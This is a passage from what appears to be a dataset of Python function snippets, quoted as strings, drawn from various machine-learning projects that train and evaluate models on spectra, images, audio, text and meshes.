'n':\n return\n elif not ans[0] == 'y':\n path_to_models = input(\"Please define the new path: \\n\")\n \"\"\"\n\n print(spectra.shape)\n sys.exit()\n\n if display_step is None:\n print_progress = False\n display_step = 1E6\n else:\n print_progress = True\n\n\n loss_test_reps = np.zeros(n_rep)\n n_data = image.l\n\n # data_sigma = np.zeros((n_data,1))\n # sigma_clusters = np.zeros((image.n_clusters, image.l))\n # for cluster in range(image.n_clusters):\n # ci_low = np.nanpercentile(np.log(spectra[cluster]), 16, axis=0)\n # ci_high = np.nanpercentile(np.log(spectra[cluster]), 84, axis=0)\n # sigma_clusters[cluster, :] = np.absolute(ci_high - ci_low)\n # data_sigma[cluster*image.l : (cluster+1)*image.l,0] = np.absolute(ci_high-ci_low)\n\n # new??? #TODO: verplaats dit naar determine_dE1\n wl1 = round(image.l / 20)\n wl2 = wl1 * 2\n units_per_bin = 4\n nbins = round(image.l / units_per_bin) # 150\n spectra_smooth = smooth_clusters(image, spectra, wl1)\n dy_dx = derivative_clusters(image, spectra_smooth)\n smooth_dy_dx = smooth_clusters(image, dy_dx, wl2)\n # dE1s = find_clusters_dE1(image, smooth_dy_dx, spectra_smooth)\n\n dE1 = determine_dE1_new(image, smooth_dy_dx, spectra_smooth) * added_dE1 # dE1s, dy_dx)\n # image.dE1 = dE1\n\n # TODO: instead of the binned statistics, just use xth value to dischart -> neh says Juan\n times_dE1 = 3\n min_dE2 = image.deltaE.max() - image.ddeltaE * image.l * 0.05 # at least 5% zeros at end\n dE2 = np.minimum(times_dE1 * dE1,\n min_dE2) # minimal 1eV at the end with zeros #determine_dE2_new(image, spectra_smooth, smooth_dy_dx)#[0], nbins, dE1)\n\n if print_progress: print(\"dE1 & dE2:\", np.round(dE1, 3), dE2)\n\n ab_deltaE = find_scale_var(image.deltaE)\n deltaE_scaled = scale(image.deltaE, ab_deltaE)\n\n # all_spectra = image.data\n # all_spectra[all_spectra<1] = 1\n # int_log_I = np.log(np.sum(all_spectra, axis=2)).flatten()\n\n all_spectra = np.empty((0, image.l))\n\n for i in range(len(spectra)):\n all_spectra = np.append(all_spectra, spectra[i], axis=0)\n\n int_log_I = np.log(np.sum(all_spectra, axis=1)).flatten()\n ab_int_log_I = find_scale_var(int_log_I)\n del all_spectra\n\n if not os.path.exists(path_to_models + \"scale_var.txt\"):\n np.savetxt(path_to_models + \"scale_var.txt\", ab_int_log_I)\n\n if not os.path.exists(path_to_models + \"dE1.txt\"):\n # np.savetxt(path_to_models+ \"/dE1\" + str(bs_rep_num) + \".txt\", dE1)\n np.savetxt(path_to_models + \"dE1.txt\", np.vstack((image.clusters, dE1)))\n\n\n for i in range(n_rep):\n if print_progress: print(\"Started training on replica number {}\".format(i) + \", at time \", dt.datetime.now())\n data = np.empty((0, 1))\n data_x = np.empty((0, 2))\n data_sigma = np.empty((0, 1))\n\n\n n_cluster = len(spectra[cluster])\n idx = random.randint(0, n_cluster - 1)\n # data[cluster*image.l : (cluster+1)*image.l,0] = np.log(spectra[cluster][idx])\n select1 = len(image.deltaE[image.deltaE < dE1[cluster]])\n select2 = len(image.deltaE[image.deltaE > dE2[cluster]])\n data = np.append(data, np.log(spectra[cluster][idx][:select1]))\n data = np.append(data, np.zeros(select2))\n\n pseudo_x = np.ones((select1 + select2, 2))\n pseudo_x[:select1, 0] = deltaE_scaled[:select1]\n pseudo_x[-select2:, 0] = deltaE_scaled[-select2:]\n int_log_I_idx_scaled = scale(np.log(np.sum(spectra[cluster][idx])), ab_int_log_I)\n pseudo_x[:, 1] = int_log_I_idx_scaled\n\n data_x = np.concatenate((data_x, pseudo_x)) # np.append(data_x, pseudo_x)\n\n data_sigma = np.append(data_sigma, sigma_clusters[cluster][:select1])\n data_sigma = np.append(data_sigma, 0.8 * np.ones(select2))\n\n model = MLP(num_inputs=1, num_outputs=1)\n model.apply(weight_reset)\n # optimizer = optim.RMSprop(model.parameters(), lr=6 * 1e-3, eps=1e-5, momentum=0.0, alpha = 0.9)\n optimizer = optim.Adam(model.parameters(), lr=lr)\n\n\n train_x, test_x, train_y, test_y, train_sigma, test_sigma = train_test_split(data_x, data, data_sigma,\n test_size=0.4)\n\n N_test = len(test_x)\n N_train = len(train_x)\n\n test_x = test_x.reshape(N_test, 2)\n test_y = test_y.reshape(N_test, 1)\n train_x = train_x.reshape(N_train, 2)\n train_y = train_y.reshape(N_train, 1)\n train_sigma = train_sigma.reshape(N_train, 1)\n test_sigma = test_sigma.reshape(N_test, 1)\n\n train_x = torch.from_numpy(train_x)\n train_y = torch.from_numpy(train_y)\n train_sigma = torch.from_numpy(train_sigma)\n test_x = torch.from_numpy(test_x)\n test_y = torch.from_numpy(test_y)\n test_sigma = torch.from_numpy(test_sigma)\n\n # train_data_x, train_data_y, train_errors = get_batch(i)\n # loss_train = np.zeros(n_epochs)\n loss_test = np.zeros(n_epochs)\n loss_train_n = np.zeros(n_epochs)\n min_loss_test = 1e6 # big number\n n_stagnant = 0\n n_stagnant_max = 5\n for epoch in range(1, n_epochs + 1):\n model.train()\n output = model(train_x.float())\n loss_train = loss_fn(output, train_y, train_sigma)\n loss_train_n[epoch - 1] = loss_train.item()\n\n optimizer.zero_grad()\n loss_train.backward()\n optimizer.step()\n\n model.eval()\n with torch.no_grad():\n output_test = model(test_x.float())\n loss_test[epoch - 1] = loss_fn(output_test, test_y, test_sigma).item()\n if epoch % display_step == 0 and print_progress:\n print('Rep {}, Epoch {}, Training loss {}, Testing loss {}'.format(i, epoch,\n round(loss_train.item(), 3),\n round(loss_test[epoch - 1], 3)))\n if round(loss_test[epoch - 1], 3) >= round(loss_test[epoch - 1 - display_step], 3):\n n_stagnant += 1\n else:\n n_stagnant = 0\n if n_stagnant >= n_stagnant_max:\n if print_progress: print(\"detected stagnant training, breaking\")\n break\n if loss_test[epoch - 1] < min_loss_test:\n loss_test_reps[i] = loss_test[epoch - 1]\n min_loss_test = loss_test_reps[i]\n min_model = copy.deepcopy(model)\n # iets met copy.deepcopy(model)\n if epoch % saving_step == 0:\n torch.save(min_model.state_dict(), path_to_models + \"nn_rep\" + str(save_idx))\n with open(path_to_models + \"costs\" + \".txt\", \"w\") as text_file:\n text_file.write(str(min_loss_test))\n torch.save(min_model.state_dict(), path_to_models + \"nn_rep\" + str(save_idx))\n with open(path_to_models + \"costs\" + \".txt\", \"w\") as text_file:\n text_file.write(str(min_loss_test))\n # np.savetxt(path_to_models+ \"costs\" + str(bs_rep_num) + \".txt\", min_loss_test) # loss_test_reps[:epoch])", "def train_test_model_batch():\n train=learning.Train_kmer_clf()\n train.run()", "def test_model_runs(self):\n batch = _get_face_model_batch()\n pred_dist = self.model(batch, is_training=False)\n logits = pred_dist.logits\n with self.session() as sess:\n sess.run(tf.global_variables_initializer())\n vertices = np.random.rand(_BATCH_SIZE, _NUM_INPUT_VERTS, 3) - 0.5\n vertices_mask = np.ones([_BATCH_SIZE, _NUM_INPUT_VERTS])\n faces = np.random.randint(\n _NUM_INPUT_VERTS + 2, size=[_BATCH_SIZE, _NUM_INPUT_FACE_INDICES])\n sess.run(\n logits,\n {batch['vertices']: vertices,\n batch['vertices_mask']: vertices_mask,\n batch['faces']: faces}\n )", "def test_model(model, dataObj, index):\n\t(s,m,l), img = dataObj.__getitem__(index)\n\timg = img.float().unsqueeze(0)\n\t\n\tif next(model.parameters()).is_cuda:\n\t\toutput = model(img.cuda()) \n\telse:\n\t\toutput = model(img)\n\n\ts_pred,m_pred,l_pred = output[0].squeeze(0).cpu(), output[1].squeeze(0).cpu(), output[2].squeeze(0).cpu()\n\ts_pred = s_pred.detach().numpy()\n\tm_pred = m_pred.detach().numpy()\n\tl_pred = l_pred.detach().numpy()\n\n\timg = img.float().squeeze(0)\n\timg = img.permute(1,2,0)\n\n\tfor j in range(22):\n\t\tvisualize(img, s[j], m[j], l[j], s_pred[j], m_pred[j], l_pred[j])\n\t\tk = np.array(s[j])", "def test(model, dataloader, idx_to_char, device, config, with_analysis=False, plot_all=False, validation=True, with_iterations=False):\n\n model.eval()\n i = -1\n stat = \"validation\" if validation else \"test\"\n\n for i,x in enumerate(dataloader):\n line_imgs = x['line_imgs'].to(device)\n gt = x['gt'] # actual string ground truth\n\n if \"strokes\" in x and x[\"strokes\"] is not None:\n online = x[\"strokes\"].to(device)\n else:\n online = Variable(x['online'].to(device), requires_grad=False).view(1, -1, 1) if config[\n \"online_augmentation\"] and config[\"online_flag\"] else None\n\n\n loss, initial_err, pred_str = config[\"trainer\"].test(line_imgs, online, gt, validation=validation, with_iterations=with_iterations)\n\n if plot_all:\n imgs = x[\"line_imgs\"][:, 0, :, :, :] if config[\"n_warp_iterations\"] else x['line_imgs']\n plot_recognition_images(imgs, f\"{config['current_epoch']}_{i}_testing\", pred_str, config[\"image_test_dir\"], plot_count=4)\n\n # Only do one test\n if config[\"TESTING\"]:\n break\n\n if i >= 0: # if there was any test data, calculate the CER\n utils.reset_all_stats(config, keyword=stat)\n cer = config[\"stats\"][config[f\"designated_{stat}_cer\"]].y[-1] # most recent test CER\n\n if not plot_all:\n imgs = x[\"line_imgs\"][:, 0, :, :, :] if with_iterations else x['line_imgs']\n plot_recognition_images(imgs, f\"{config['current_epoch']}_testing\", pred_str, config[\"image_test_dir\"], plot_count=4)\n\n LOGGER.debug(config[\"stats\"])\n return cer\n else:\n log_print(f\"No {stat} data!\")\n return np.inf", "def test(self):\n self.model.eval()\n\n for step, sample in enumerate(self.test_loader):\n x, _, _ = sample\n x = x.to(self.device)\n\n y_pred = self.model.forward(x)\n loss = nn.MSELoss()(y_pred, x)\n self.test_losses.append(loss.item())\n\n if step % (max(8, len(self.test_loader)) // 8) == 0:\n out_img = torch.cat([x[0], torch.clamp(y_pred[0], 0, 1)], dim=2)\n self.sw.add_image(tag=f'sample_{step}', img_tensor=out_img, global_step=self.epoch)\n\n # log average loss on test set\n mean_test_loss = np.mean(self.test_losses)\n self.test_losses = []\n print(f'\\t● AVG Loss on TEST-set: {mean_test_loss:.6f} │ patience: ', end='')\n self.sw.add_scalar(tag='test_loss', scalar_value=mean_test_loss, global_step=self.epoch)\n\n # save best model and update training patience\n if self.best_test_loss is None or mean_test_loss < self.best_test_loss:\n self.best_test_loss = mean_test_loss\n self.patience = conf.FX_PATIENCE\n torch.save(self.model.state_dict(), self.log_path / 'best.pth')\n else:\n self.patience = self.patience - 1\n print(f'{self.patience}/{conf.FX_PATIENCE}')\n\n if self.patience == 0:\n self.show_completion_msg()", "def on_train_begin(self, logs):\n print(f\"Testing for {self.params['nb_episodes']} episodes ...\")", "def test_model(self, model, test_name):\n statistics = []\n stats = []\n for item in model.get_topics():\n statistics.append(item)\n statistics.append([\"Article topic\", \"Model topic index\"])\n self.connect_topic_id_to_topics(model)\n\n for article in self.testing_docs:\n analysis_res = model.analyse_text(article[1])\n if len(analysis_res) == 0:\n print(\"nothing found\")\n continue\n res = max(analysis_res, key=lambda item: item[1])\n statistics.append([article[0], res[0]])\n if res[0] not in self.topics_of_index:\n self.topics_of_index[res[0]] = [article[0]]\n self.topic_indexes[article[0]] = res[0]\n print(\"continuing\")\n continue\n\n stats.append(1 if article[0] in self.topics_of_index[res[0]] else 0)\n topic_number_index = self.topic_numbers.index(article[0])\n\n if article[0] in self.topics_of_index[res[0]]:\n guessed_topic_number_index = self.topic_numbers.index(article[0])\n else:\n guessed_topic_number_index = self.topic_numbers.index(self.topics_of_index[res[0]][0])\n self.confusion_matrix[guessed_topic_number_index][topic_number_index] += 1\n self.confusion_matrix_true[res[0]][topic_number_index] += 1\n #self.log_writer.add_log(\"Article with topic {} was assigned {} with {} certainty.\".format(article[0], \"correctly\" if res[0] == self.topic_positions[article[0]] else \"wrong\", res[1]))\n\n self.log_writer.write_2D_list(test_name, statistics)\n self.add_descriptions_to_confusion_matrix()\n self.log_writer.write_2D_list(test_name+\"\\\\confusion-matrix\", self.confusion_matrix)\n self.log_writer.write_2D_list(test_name+\"\\\\confusion-matrix-true\", self.confusion_matrix_true)\n return sum(stats)/len(stats)", "def train():\n import trace\n trace.train()", "def run_experiments() :\n #%%\n target_size=(32,32)\n g_specs = {\n \"batch_size\" : [ 30 , 60, 100 ],\n \"learning_rate\" : [ 0.0002, 0.0003, 0.0005 ],\n \"drop_out_rate\" : [ 0.2, 0.25, 0.3 ],\n \"rescale_mode\" : [ \"max_q\" , \"max\", \"\" ]\n }\n\n model_traits = MODEL_TRAITS[\"model2\"].copy()\n tt_obj = model_traits[\"trainer_tester_class\"]( model_traits )\n del model_traits[\"trainer_tester_class\"]\n\n cnt = 0\n for batchs, lrate, do_rate, resc_mode in product( g_specs[\"batch_size\"],\n g_specs[\"learning_rate\"],\n g_specs[\"drop_out_rate\"],\n g_specs[\"rescale_mode\"] ) :\n\n tt_obj.model_traits.update( {\"batch_size\" : batchs,\n \"learning_rate\" : lrate,\n \"rescale_mode\" : resc_mode,\n \"drop_out_rate\" : do_rate } )\n\n train_4d, train_gt = tu.make_4d_arrays( images_dir=\"images/train\",\n target_size=target_size )\n\n test_4d, test_gt = tu.make_4d_arrays( images_dir=\"images/test\",\n target_size=target_size )\n\n data = {\"train_4d\" : train_4d,\n \"test_4d\" : test_4d,\n \"train_y\" : train_gt,\n \"test_y\" : test_gt}\n\n valid_accu_log, train_accu_log = tt_obj.train( model_traits, data,\n logl=100 )\n idx_v = int(np.argmax( valid_accu_log))\n idx_t = int(np.argmax( train_accu_log))\n\n model_traits.update({\"valid_accu_log\" : valid_accu_log,\n \"train_accu_log\" : train_accu_log,\n \"best_valid\" : max(valid_accu_log),\n \"best_valid_at\" : idx_v,\n \"train_at_best_valid\" : train_accu_log[idx_v],\n \"best_train\" : max(train_accu_log),\n \"best_train_at\": idx_t })\n\n #print(cnt, pformat(model_traits) )\n print( \"%d : best_train = %.4f, best_valid = %.4f\" % \\\n (cnt, max(train_accu_log), max(valid_accu_log) ))\n\n with open( \"exp_results_%d.json\" % cnt,\n \"wt\" , encoding=\"utf8\" ) as f_out :\n print( json.dumps( model_traits ), file=f_out)\n\n\n cnt += 1\n #%%", "def test_model(epoch):\n model.eval()\n test_metrics = {\"loss\": [], \"acc\": []}\n timer = Timer()\n for batch_i, (X, y) in enumerate(test_dataloader):\n batch_i += 1\n image_sequences = Variable(X.to(device), requires_grad=False)\n labels = Variable(y, requires_grad=False).to(device)\n\n with torch.no_grad():\n # Reset LSTM hidden state\n model.lstm.reset_hidden_state()\n # Get sequence predictions\n predictions = model(image_sequences)\n\n # Compute metrics\n loss = criterion(predictions, labels)\n acc = (predictions.detach().argmax(1) == labels).cpu().numpy().mean()\n\n # Keep track of loss and accuracy\n test_metrics[\"loss\"].append(loss.item())\n test_metrics[\"acc\"].append(acc)\n\n # Determine approximate time left\n batches_done = batch_i - 1\n batches_left = len(test_dataloader) - batches_done\n time_left = datetime.timedelta(seconds=batches_left * timer.seconds())\n time_iter = round(timer.seconds(), 3)\n timer.reset()\n\n # Log test performance\n logger.info(\n f'Testing - [Epoch: {epoch}/{cfg.train.num_epochs}] [Batch: {batch_i}/{len(test_dataloader)}] [Loss: {np.mean(test_metrics[\"loss\"]):.3f}] [Acc: {np.mean(test_metrics[\"acc\"]):.3f}] [ETA: {time_left}] [Iter time: {time_iter}s/it]'\n )\n\n writer.add_scalar(\"test/loss\", np.mean(test_metrics[\"loss\"]), epoch)\n writer.add_scalar(\"test/acc\", np.mean(test_metrics[\"acc\"]), epoch)\n\n model.train()", "def eval(self):\r\n if WORDSPLIT:\r\n train, test = self.get_train_test_wordsplit()\r\n elif UTTERANCE_SPLIT:\r\n train, test, val = self.get_train_test_utterance_split()\r\n wordlist = joblib.load('wordlist.pkl')\r\n dictionary = joblib.load('dict.pkl')\r\n phones = joblib.load('phones.pkl')\r\n metadata_help = {'wordlist': wordlist, 'dictionary': dictionary, 'phones': phones}\r\n p2c = utils.phone2class(phones)\r\n c2p = utils.class2phone(phones)\r\n \"\"\"Get test generator\"\"\"\r\n test_data = Dataset({'files': test, 'mode': 'eval', 'metadata_help': metadata_help})\r\n test_gen = data.DataLoader(test_data, batch_size=1,\r\n shuffle=True, collate_fn=test_data.collate_eval, drop_last=True)\r\n for batch_number, features in tqdm(enumerate(test_gen)):\r\n spectrograms = features['spectrograms']\r\n phones = features['phones']\r\n batch_metadata = features['metadata'][0]\r\n self.G = self.G.eval()\r\n\r\n outputs = self.G(spectrograms)\r\n outputs = np.squeeze(outputs.detach().cpu().numpy())\r\n phones = np.squeeze(phones.detach().cpu().numpy())\r\n phones = phones.astype(dtype=int)\r\n phones = [c2p[x] for x in phones]\r\n\r\n output_classes = np.argmax(outputs, axis=1)\r\n\r\n \"\"\"Decode the output predictions into a phone sequence\"\"\"\r\n # https://stackoverflow.com/questions/38065898/how-to-remove-the-adjacent-duplicate-value-in-a-numpy-array\r\n duplicates_eliminated = np.asarray([k for k, g in groupby(output_classes)])\r\n blanks_eliminated = duplicates_eliminated[duplicates_eliminated != 0]\r\n predicted_phones_ = [c2p[x] for x in blanks_eliminated]\r\n \"\"\"remove SOS and EOS\"\"\"\r\n predicted_phones = []\r\n for x in predicted_phones_:\r\n if x != 'SOS' and x != 'EOS':\r\n predicted_phones.append(x)\r\n\r\n data_to_save = {'speaker': batch_metadata['speaker'],\r\n 'word': batch_metadata['word'],\r\n 'true_phones': batch_metadata['phones'],\r\n 'predicted_phones': predicted_phones}\r\n dump_path = os.path.join(self.predict_dir, batch_metadata['utterance'] + '.pkl')\r\n joblib.dump(data_to_save, dump_path)", "def run_tests():\n source1 = TextModel('CS111 Syllabus')\n source1.add_file('CS111_Syllabus.txt')\n\n source2 = TextModel('AR Syllabus')\n source2.add_file('AR_Syllabus.txt')\n\n new1 = TextModel('WR120 Syllabus')\n new1.add_file('WR120_Syllabus.txt')\n new1.classify(source1, source2)\n \n new2 = TextModel('CS131 Syllabus')\n new2.add_file('CS131_Syllabus.txt')\n new2.classify(source1, source2)\n \n new3 = TextModel('My Paper 2 for WR120')\n new3.add_file('WR_Paper_2.txt')\n new3.classify(source1, source2)\n \n new4 = TextModel('CS111 PS9PR0')\n new4.add_file('ps9pr0.txt')\n new4.classify(source1, source2)", "def Analyze_Model(model_list,test_types):\n N_neurons = [20,40,60,80,100,120]\n num_test = len(test_types)\n\n\n #### VISUALIZING FUNCTIONS ####", "def main():\n\n # Load the data and scale\n x_train = np.load(\"../data/audio/ESC-10/esc10_raw_train_audio.npy\")[:,:,0]\n y_train = np.load(\"../data/audio/ESC-10/esc10_raw_train_labels.npy\")\n x_test = np.load(\"../data/audio/ESC-10/esc10_raw_test_audio.npy\")[:,:,0]\n y_test = np.load(\"../data/audio/ESC-10/esc10_raw_test_labels.npy\")\n\n x_train = (x_train.astype('float32') + 32768) / 65536\n x_test = (x_test.astype('float32') + 32768) / 65536\n\n # Train and test the models\n train(x_train, y_train, x_test, y_test)", "def training_controller(self, silent=True, plot=False):\n no_labels = len(self.dataset['label'].unique())\n active_models = self.active_models\n active_models = self.ignore_suboptimal_combinations(active_models)\n models_to_run = {model: ExtendedPipeline(model,self.vectorizer,self.transform,self.stemmer,apply_stemming=False)\n for model in active_models}\n with self.database:\n cur = self.database.cursor()\n\n # if there is no data for the current training settings, create an entry in the table\n for model in active_models:\n uid = self.uid_base+'_'+model\n try:\n cur.execute(\"INSERT INTO model_performance_results VALUES (?,?,?,?,?,0,0,?)\",\n (uid,self.stemmer,self.vectorizer,self.transform,model,no_labels))\n self.best_score_ledger[model] = [0, 0]\n except sqlite3.IntegrityError:\n scores_to_beat = cur.execute(\"\"\"SELECT f1_score,accuracy from model_performance_results\n WHERE unique_id = ? \"\"\",\n (self.uid_base+'_'+model,))\n self.best_score_ledger[model] = [_ for _ in list(scores_to_beat)[0]]\n\n self.get_best_model_configs()\n results = defaultdict(dict)\n\n # run n iterations for each model in this configuration\n for _ in tqdm.tqdm(range(self.iterations)):\n if not silent:\n print(f'\\nRound {_}:\\nStemmer : {self.stemmer}\\nTransformer : {self.transform}\\n')\n self.shuffle_dataset()\n for name,model in models_to_run.items():\n res = self.train_models(model, silent=silent)\n scre = res[2]\n if plot and scre > results[name]['score']:\n results[name] = res\n\n # updating model performance results table\n for model in active_models:\n uid = self.uid_base + '_' + model\n with self.database:\n cur = self.database.cursor()\n cur.execute(\"UPDATE model_performance_results SET accuracy = ?,f1_score = ? WHERE unique_id = ?\",\n (self.best_score_ledger[model][0],self.best_score_ledger[model][1],uid))", "def classic_model_testing():\n dataset_path = \"/home/kateryna/Documents\"\n X_train, X_test, y_train, y_test = generate_embeddings_memory(dataset_path, classes=['normal', 'glare_small'])\n contam = 0.08\n models = [XGBOD(), OCSVM(contamination=contam), IForest(contamination=contam, n_estimators=150), XGBOD(learning_rate=0.01, n_estimators=150),\n COPOD(contamination=contam)]\n for model in models:\n model_name = model.__str__().split('(')[0]\n clf = model\n clf.fit(X_train, y_train)\n\n y_train_pred = clf.labels_\n y_train_scores = clf.decision_scores_\n\n # get the prediction on the test data\n # 0 stands for inliers and 1 for outliers.\n y_test_pred = clf.predict(X_test)\n y_test_scores = clf.decision_function(X_test)\n # y_probabilities = clf.predict_proba(X_test)\n print(\"\\nOn Training Data:\")\n evaluate_print(model_name, y_train, y_train_scores)\n print(\"\\nOn Test Data:\")\n evaluate_print(model_name, y_test, y_test_scores)\n print('roc auc', roc_auc_score(y_test, y_test_scores))\n\n conf_mtx_test = confusion_matrix(y_test, y_test_pred, labels=[0, 1])\n print(conf_mtx_test)\n conf_mtx_train = confusion_matrix(y_train, y_train_pred, labels=[0, 1])\n print(conf_mtx_train)\n print('~~~')", "def do_system_testing(dataset, result_path, feature_path, model_path, feature_params, detector_params,\n dataset_evaluation_mode='folds', classifier_method='gmm', overwrite=False):\n\n if classifier_method != 'gmm':\n raise ValueError(\"Unknown classifier method [\"+classifier_method+\"]\")\n\n # Check that target path exists, create if not\n check_path(result_path)\n\n for fold in dataset.folds(mode=dataset_evaluation_mode):\n for scene_id, scene_label in enumerate(dataset.scene_labels):\n current_result_file = get_result_filename(fold=fold, scene_label=scene_label, path=result_path)\n\n if not os.path.isfile(current_result_file) or overwrite:\n results = []\n\n # Load class model container\n model_filename = get_model_filename(fold=fold, scene_label=scene_label, path=model_path)\n if os.path.isfile(model_filename):\n model_container = load_data(model_filename)\n else:\n raise IOError(\"Model file not found [%s]\" % model_filename)\n\n file_count = len(dataset.test(fold, scene_label=scene_label))\n for file_id, item in enumerate(dataset.test(fold=fold, scene_label=scene_label)):\n progress(title_text='Testing',\n fold=fold,\n percentage=(float(file_id) / file_count),\n note=scene_label+\" / \"+os.path.split(item['file'])[1])\n\n # Load features\n feature_filename = get_feature_filename(audio_file=item['file'], path=feature_path)\n\n if os.path.isfile(feature_filename):\n feature_data = load_data(feature_filename)['feat']\n else:\n # Load audio\n if os.path.isfile(dataset.relative_to_absolute_path(item['file'])):\n y, fs = load_audio(filename=item['file'], mono=True, fs=feature_params['fs'])\n else:\n raise IOError(\"Audio file not found [%s]\" % item['file'])\n\n # Extract features\n feature_data = feature_extraction(y=y,\n fs=fs,\n include_mfcc0=feature_params['include_mfcc0'],\n include_delta=feature_params['include_delta'],\n include_acceleration=feature_params['include_acceleration'],\n mfcc_params=feature_params['mfcc'],\n delta_params=feature_params['mfcc_delta'],\n acceleration_params=feature_params['mfcc_acceleration'],\n statistics=False)['feat']\n\n # Normalize features\n feature_data = model_container['normalizer'].normalize(feature_data)\n\n current_results = event_detection(feature_data=feature_data,\n model_container=model_container,\n hop_length_seconds=feature_params['hop_length_seconds'],\n smoothing_window_length_seconds=detector_params['smoothing_window_length'],\n decision_threshold=detector_params['decision_threshold'],\n minimum_event_length=detector_params['minimum_event_length'],\n minimum_event_gap=detector_params['minimum_event_gap'])\n\n # Store the result\n for event in current_results:\n results.append((dataset.absolute_to_relative(item['file']), event[0], event[1], event[2] ))\n\n # Save testing results\n with open(current_result_file, 'wt') as f:\n writer = csv.writer(f, delimiter='\\t')\n for result_item in results:\n writer.writerow(result_item)", "def learn(self):\n metrics_hist = dict()\n max_runs = 3\n for run in range(max_runs):\n all_indices, initial_indices = self._init_al_dataset()\n\n metrics_hist[str(run)] = dict()\n\n current_indices = list(initial_indices)\n \n for split in self.data_splits_frac:\n print(f'\\nRUN {run} - SPLIT - {split*100:0.0f}%')\n\n # Initialise models\n self._init_models(mode='svaal')\n\n # Do some label stuff\n unlabelled_indices = np.setdiff1d(list(all_indices), current_indices)\n unlabelled_sampler = data.sampler.SubsetRandomSampler(unlabelled_indices)\n unlabelled_dataloader = data.DataLoader(self.datasets['train'],\n sampler=unlabelled_sampler,\n batch_size=64,\n drop_last=False)\n\n print(f'Labelled: {len(current_indices)} Unlabelled: {len(unlabelled_indices)} Total: {len(all_indices)}')\n\n # TODO: Make the SVAAL allow 100% labelled and 0% unlabelled to pass through it. Breaking out of loop for now when data hits 100% labelled.\n if len(unlabelled_indices) == 0:\n break\n\n metrics, svae, discriminator = self.train(dataloader_l=self.labelled_dataloader,\n dataloader_u=unlabelled_dataloader,\n dataloader_v=self.val_dataloader,\n dataloader_t=self.test_dataloader,\n mode='svaal') \n print(f'Test Eval.: F1 Scores - Macro {metrics[0]*100:0.2f}% Micro {metrics[1]*100:0.2f}%') \n \n # Record performance at each split\n metrics_hist[str(run)][str(split)] = metrics\n\n \n sampled_indices = self.sample_adversarial(svae, discriminator, unlabelled_dataloader, indices=unlabelled_indices, cuda=True) # TODO: review usage of indices arg\n current_indices = list(current_indices) + list(sampled_indices)\n sampler = data.sampler.SubsetRandomSampler(current_indices)\n self.labelled_dataloader = data.DataLoader(self.datasets['train'], sampler=sampler, batch_size=self.batch_size, drop_last=True)\n \n # write results to disk\n with open('results.json', 'w') as fj:\n json.dump(metrics_hist, fj, indent=4)", "def model_test(epo, natural):\n\tmodel.eval()\n\twith torch.no_grad():\n\t\tn = batch_size\n\n\t\tif natural:\n\t\t\tloader = nat_test_loader\n\t\t\tprefix = \"nat\"\n\t\telse:\n\t\t\tloader = syn_test_loader\n\t\t\tprefix = \"syn\"\n\n\t\tlog_cor_file = open(directory + \"/logs/test_\" + prefix + \"_cor_log.txt\", \"a\") # Correct\n\t\tlog_mae_file = open(directory + \"/logs/test_\" + prefix + \"_mae_log.txt\", \"a\") # MAE\n\t\tlog_dev_file = open(directory + \"/logs/test_\" + prefix + \"_dev_log.txt\", \"a\") # DEV\n\t\tlog_sam_file = open(directory + \"/logs/test_\" + prefix + \"_sam_log.txt\", \"a\") # Sample\n\n\t\tccs = []\n\t\tlabls = []\n\t\tnum_unlabeled = 0\n\t\tfor batch_idx, (data, labels) in enumerate(loader):\n\t\t\tdata = data.cuda()\n\t\t\tlabels = labels.float().cuda()\n\n\t\t\tmodel.mode = 'natural' if natural else 'synth'\n\t\t\trecon_batch, mu, logvar, cc = model(data)\n\n\t\t\tcc[labels == 0] = 0 # Sets the counted cells to 0 for unlabeled data, so that regressor_loss=0\n\t\t\tnum_unlabeled += (labels == 0).sum()\n\t\t\t_, _, _ = loss_function(recon_batch, data, mu, logvar, cc, labels, natural)\n\n\t\t\tccs.append(cc.cpu().detach().numpy())\n\t\t\tlabls.append(labels.cpu().detach().numpy())\n\n\t\t\tif batch_idx == 0 and epo % 1000 == 0:\n\t\t\t\t# Save test sample\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\t\t\t# Save switch sample\n\t\t\t\tmodel.mode = 'synth' if natural else 'natural'\n\t\t\t\trecon_batch, _, _, _ = model(data)\n\t\t\t\tcomparison = torch.cat([data[:n], recon_batch.view(batch_size, 1, img_size, img_size)[:n]])\n\t\t\t\tsave_image(comparison.cpu(), directory + \"/switch_\" + prefix + \"_\" + str(epo) + \".png\", nrow=n)\n\n\t\tpreds = np.concatenate(ccs, axis=None) # Elementwise round of cellcounts\n\t\tlbls = np.concatenate(labls, axis=None) # Elementswise round of labels\n\n\t\tlog_sam_file.write(str(np.round(preds, 2)) + \"\\n\" + str(lbls) + \"\\n\")\n\t\tpreds = np.around(preds)\n\t\t#lbls = np.around(lbls)\n\n\t\tcorrect = np.sum(preds == lbls) # Count elementwise equality of predictions and labels\n\t\tlen_set = len(loader.dataset)\n\t\tcorrect -= num_unlabeled # Remove zero_indices from numerator\n\t\tcorrect = float(correct) / float(len_set - num_unlabeled) # Remove zero_indices from denominator\n\n\t\tdist_sum = np.sum(np.abs(np.subtract(preds, lbls))) # Elementwise addition of dist between preds and lbls\n\t\tMAE = dist_sum / float(len_set - num_unlabeled)\n\n\t\tlen_labeled = float(len_set - num_unlabeled)\n\t\tdev = np.ones(len_set) - np.divide(preds, lbls) # Deviation contains NaNs because syn data has lbl=0\n\t\tavg_dev = np.sum(np.abs(np.where(np.isnan(dev), 0, dev))) / len_labeled # Take the avg only of those deviations that weren't NaN\n\n\t\tlog_cor_file.write(str(correct)+\"\\n\")\n\t\tlog_mae_file.write(str(MAE)+\"\\n\")\n\t\tlog_dev_file.write(str(avg_dev)+\"\\n\")\n\n\t\t#logfile.write(str(correct) + \" correct, MAE: \" + str(MAE) + \", DEV: \" + str(avg_dev) + \" in \" + prefix + \" set in epoch \" + str(epoch) + \"\\n\\n\")\n\t\tlog_cor_file.close()\n\t\tlog_mae_file.close()\n\t\tlog_dev_file.close()\n\t\tlog_sam_file.close()\n\n\t\tglobal distance_sum\n\t\tdistance_sum = dist_sum\n\t\treturn correct, MAE", "def test_all(log_file_in_tmpdir, tmp_path):\n elements = [\n Component('macro', 'macro_impl'),\n Component('micro', 'micro_impl', [NUM_MICROS])]\n\n conduits = [\n Conduit('macro.out', 'micro.in'),\n Conduit('micro.out', 'macro.in')]\n\n model = 